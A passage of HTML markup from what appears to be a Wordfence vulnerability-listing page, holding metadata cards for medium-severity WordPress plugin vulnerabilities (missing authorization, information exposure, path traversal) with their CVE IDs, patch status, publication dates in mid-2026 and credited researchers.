						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13604" target="_blank" rel="noopener noreferrer">							CVE-2026-13604						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixelavo" target="_blank" rel="noopener">Pixelavo – Server Side Tracking &amp; Pixel + AI Ads Tools</a> <span class="wfvr-software-slug">[pixelavo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-amin-ullah-sheikh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/789d82b6dd44c10255b1752a99118a7e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="789d82b6dd44c10255b1752a99118a7e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-amin-ullah-sheikh" target="_blank" rel="noopener">Md Amin Ullah Sheikh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22175f1f-1dc0-45a1-a72e-3135ea6de7fc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ca14ec54-0864-47f7-9653-1fe04e2875de" target="_blank" rel="noopener">PixelYourSite &lt;= 11.2.1 &#8211; Unauthenticated Sensitive Information Exposure via Order-Received Endpoint Missing Key Validation</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18059" target="_blank" rel="noopener noreferrer">							CVE-2026-18059						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixelyoursite" target="_blank" rel="noopener">PixelYourSite – Your smart PIXEL (TAG) &amp; API Manager</a> <span class="wfvr-software-slug">[pixelyoursite]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixelyoursite-pro" target="_blank" rel="noopener">PixelYourSite Pro – Your smart PIXEL (TAG) Manager</a> <span class="wfvr-software-slug">[pixelyoursite-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yongtae-jeon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d8e6822edce0e2861e1ce160f4975e34.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d8e6822edce0e2861e1ce160f4975e34"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yongtae-jeon" target="_blank" rel="noopener">Win3</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ca14ec54-0864-47f7-9653-1fe04e2875de" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f5dc2350-0dd3-4233-983f-3c7d294d18d1" target="_blank" rel="noopener">Product Attachment for WooCommerce &lt; 2.3.3 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16285" target="_blank" rel="noopener noreferrer">							CVE-2026-16285						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-product-attachment" target="_blank" rel="noopener">Product Attachment for WooCommerce</a> <span class="wfvr-software-slug">[woo-product-attachment]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kevin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5a88f0d2ed56d288f5ba6f81e521fe8b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a88f0d2ed56d288f5ba6f81e521fe8b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kevin" target="_blank" rel="noopener">Kevin</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f5dc2350-0dd3-4233-983f-3c7d294d18d1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3af5f238-9b2f-47d0-89e6-30ac09227041" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login &lt; 6.0.9.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15257" target="_blank" rel="noopener noreferrer">							CVE-2026-15257						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-registration-form-builder-with-submission-manager" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login</a> <span class="wfvr-software-slug">[custom-registration-form-builder-with-submission-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonatan-buskila" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f33b59d9d341b7f561c1e475646aaeb5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f33b59d9d341b7f561c1e475646aaeb5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonatan-buskila" target="_blank" rel="noopener">Jonatan Buskila</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3af5f238-9b2f-47d0-89e6-30ac09227041" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fd4eeb13-869d-47ba-a2d3-73886abc1e03" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login &lt; 6.0.9.4 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15255" target="_blank" rel="noopener noreferrer">							CVE-2026-15255						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-registration-form-builder-with-submission-manager" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login</a> <span class="wfvr-software-slug">[custom-registration-form-builder-with-submission-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonatan-buskila" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f33b59d9d341b7f561c1e475646aaeb5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f33b59d9d341b7f561c1e475646aaeb5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonatan-buskila" target="_blank" rel="noopener">Jonatan Buskila</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fd4eeb13-869d-47ba-a2d3-73886abc1e03" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f719a2de-edb1-460e-8efd-fc2ca7fa5245" target="_blank" rel="noopener">ShopLentor Pro &lt;= 2.8.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61972" target="_blank" rel="noopener noreferrer">							CVE-2026-61972						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons-pro" target="_blank" rel="noopener">ShopLentor Pro</a> <span class="wfvr-software-slug">[woolentor-addons-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f719a2de-edb1-460e-8efd-fc2ca7fa5245" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3a442498-0f80-4373-a90c-155966c04945" target="_blank" rel="noopener">Social Share, Social Login and Social Comments Plugin – Super Socializer &lt;= 7.14.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65542" target="_blank" rel="noopener noreferrer">							CVE-2026-65542						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/super-socializer" target="_blank" rel="noopener">Social Share, Social Login and Social Comments Plugin – Super Socializer</a> <span class="wfvr-software-slug">[super-socializer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8e4cd282e790f13211a36b16698009cb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e4cd282e790f13211a36b16698009cb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener">Nguyen Dinh Hai (HaiND)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3a442498-0f80-4373-a90c-155966c04945" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6cf863ce-743e-45d0-9113-e1eb8b2e8440" target="_blank" rel="noopener">Staff Training &lt;= 1.0.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65541" target="_blank" rel="noopener noreferrer">							CVE-2026-65541						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/staff-training" target="_blank" rel="noopener">Staff Training</a> <span class="wfvr-software-slug">[staff-training]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6cf863ce-743e-45d0-9113-e1eb8b2e8440" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b0d4c009-d969-49bb-a56b-a704e5f89a86" target="_blank" rel="noopener">StoreGrowth: Smart Sales Booster for WooCommerce | BOGO, Upsells, Direct Checkout, Quick View, Side Cart &lt;= 2.1.0 &#8211; Missing Authorization to Unauthenticated Arbitrary Plugin Settings Modification via bogo_category_msg_create AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13110" target="_blank" rel="noopener noreferrer">							CVE-2026-13110						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/storegrowth-sales-booster" target="_blank" rel="noopener">StoreGrowth – Upsell, BOGO, Quick View, Direct Checkout &amp; Side Cart for WooCommerce</a> <span class="wfvr-software-slug">[storegrowth-sales-booster]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b0d4c009-d969-49bb-a56b-a704e5f89a86" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e07c9c-7d35-41b4-aaa1-f37c4f10f7ac" target="_blank" rel="noopener">StoreGrowth: Smart Sales Booster for WooCommerce | BOGO, Upsells, Direct Checkout, Quick View, Side Cart &lt;= 2.1.0 &#8211; Missing Authorization to Unauthenticated Options Update via create_popup AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15411" target="_blank" rel="noopener noreferrer">							CVE-2026-15411						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/storegrowth-sales-booster" target="_blank" rel="noopener">StoreGrowth – Upsell, BOGO, Quick View, Direct Checkout &amp; Side Cart for WooCommerce</a> <span class="wfvr-software-slug">[storegrowth-sales-booster]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e07c9c-7d35-41b4-aaa1-f37c4f10f7ac" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/33e94bb9-71e4-4af8-aa8d-5972b5be1aea" target="_blank" rel="noopener">Thrive Leads Version &lt;= 10.9.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65435" target="_blank" rel="noopener noreferrer">							CVE-2026-65435						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/thrive-leads" target="_blank" rel="noopener">Thrive Leads</a> <span class="wfvr-software-slug">[thrive-leads]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dave-jong" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dave-jong" target="_blank" rel="noopener">Dave Jong</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/33e94bb9-71e4-4af8-aa8d-5972b5be1aea" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d191211-d02b-4808-8d92-c9a906117cde" target="_blank" rel="noopener">Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor &lt;= 3.0.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-25403" target="_blank" rel="noopener noreferrer">							CVE-2026-25403						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-store-kit" target="_blank" rel="noopener">Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor</a> <span class="wfvr-software-slug">[ultimate-store-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener">Bao &#8211; BlueRock</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d191211-d02b-4808-8d92-c9a906117cde" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16a4665a-df79-4def-8215-df44dffdd332" target="_blank" rel="noopener">User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor &lt;= 3.16.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66701" target="_blank" rel="noopener noreferrer">							CVE-2026-66701						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profile-builder" target="_blank" rel="noopener">User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor</a> <span class="wfvr-software-slug">[profile-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16a4665a-df79-4def-8215-df44dffdd332" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60878165-d4cc-4ea1-acf7-9bb6fd48795b" target="_blank" rel="noopener">W3 Total Cache &lt;= 2.10.2 &#8211; Unauthenticated Path Traversal</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66695" target="_blank" rel="noopener noreferrer">							CVE-2026-66695						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/w3-total-cache" target="_blank" rel="noopener">W3 Total Cache</a> <span class="wfvr-software-slug">[w3-total-cache]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mykel-nelson" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/807a1a84f7f8e0b4eb76852c9e02e21d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="807a1a84f7f8e0b4eb76852c9e02e21d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mykel-nelson" target="_blank" rel="noopener">Mykel Nelson</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60878165-d4cc-4ea1-acf7-9bb6fd48795b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
